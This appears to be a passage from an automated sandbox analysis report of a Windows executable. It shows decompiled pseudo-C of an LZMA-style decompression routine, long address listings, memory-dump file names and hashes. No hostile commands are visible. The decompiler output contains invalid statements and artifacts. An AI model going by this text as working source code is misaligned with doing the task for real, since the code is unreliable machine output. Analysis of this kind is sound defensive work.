													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                0x00000000
                0x0040680a
                0x0040680a
                0x0040680e
                0x00406833
                0x0040683d
                0x00000000
                0x00406810
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681d
                0x00406821
                0x00406821
                0x00406824
                0x004068fe
                0x004068fe
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x00000000
                0x004068f7
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x00000000
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a5a
                0x00406a60
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00406999
                0x00000000
                0x0040680e

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
